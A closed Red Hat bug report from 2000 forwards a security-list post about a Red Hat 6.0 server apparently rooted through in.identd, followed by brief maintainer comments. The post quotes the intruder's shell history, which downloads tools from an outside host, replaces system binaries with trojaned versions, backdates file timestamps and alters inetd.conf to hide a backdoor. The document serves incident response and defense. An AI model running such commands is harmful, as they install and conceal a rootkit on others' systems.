Bug 10941 - Rooted through in.identd on Red Hat 6.0
Rooted through in.identd on Red Hat 6.0
Status: CLOSED NOTABUG
Product: Red Hat Linux
Classification: Retired
Component: inetd (Show other bugs)
6.0
All Linux
medium Severity medium
: ---
: ---
Assigned To: Trond Eivind Glomsrxd
:
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 2000-04-20 08:07 EDT by smedina
Modified: 2008-05-01 11:37 EDT (History)
1 user (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2001-01-19 16:15:46 EST
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description smedina 2000-04-20 08:07:20 EDT
-----Original Message-----
From: Del Elson [mailto:del@BABEL.COM.AU]
Sent: Wednesday, April 19, 2000 1:02 AM
To: INCIDENTS@SECURITYFOCUS.COM
Subject: Rooted through in.identd on Red Hat 6.0


Hi,

A client was hacked last week by what looked like a buffer
overflow through in.identd.  This was on a Red Hat 6.0
box.

RH don't have any current security notices or fixes for
in.identd on their servers, and I haven't seen other
boxes hacked through in.identd recently.

The hacker left the usual trace in /.bash_history, which
ran like:

mkdir /usr/lib/... ; cd /usr/lib/...
ftp 200.192.58.201 21
cd /usr/lib/...
mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz?
pstree.gz;
mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz?
syslogd.gz;
mv tcpd.gz? tcpd.gz
gzip -d *
chmod +x *
mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv
syslogd /usr/sbin;
mv pt07 /usr/lib/; mv pstree /usr/bin ;
/usr/lib/pt07
echo "2 sh" >> /dev/cui220 ; echo "2 slice2" >> /dev/cui220
;
echo "2 bnc" >> /dev/220 ; echo "4 6667" >> /dev/cui221 ;
echo "3 15678" >> /dev/cui221 ; echo "2 pt07" >> /dev/cui220
;
echo "3 1679" >> /dev/cui221; echo "3 5454" >> /dev/cui221;
touch -t 199910122110 /dev/cui220
touch -t 199910122110 /dev/cui221
touch -t 199910122110 /usr/lib/pt07
touch -t 199910122110 /usr/sbin/syslogd
touch -t 199910122110 /usr/sbin/tcpd
touch -t 199910122110 /bin/ps
touch -t 199910122110 /bin/netstat
touch -t 199910122110 /usr/bin/pstree
cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
mv /tmp/b /etc/inetd.conf
killall -HUP inetd

... installing a back door and a partial cover of tracks.

The only messages in /var/log/messages around the time
were:

Apr  8 23:15:57 home identd[12006]: Connection from
200.192.58.201
Apr  8 23:15:57 home identd[12006]: from: 200.192.58.201 (
200.192.58.201 ) for: 1176, 21
Apr  8 23:16:05 home identd[12007]: Connection from
200.192.58.201
Apr  8 23:16:05 home identd[12007]: from: 200.192.58.201 (
200.192.58.201 ) for: 1176, 21

... the IP address traces back to somewhere in Brazil.

Anyone know of any current bug notices, exploits, or
patches for in.identd?

Del
Comment 1 Jeff Johnson 2000-05-11 12:46:59 EDT
Why do you think the exploit is in.identd? Because of the messages?
/usr/sbin/inetd is a much likelier target, but I don't know of any
current exploits there.
Comment 2 Pekka Savola 2000-05-11 14:07:59 EDT
I fear some by-default inetd-enabled services e.g. in.telnetd still have
a hole in them.

Please see my report #10860.
Comment 3 Trond Eivind Glomsrxd 2001-01-19 19:57:02 EST
Still no sign of bugs in identd (which at least now run as nobody or ident
anyway)... closing.

Note You need to log in before you can comment on or make changes to this bug.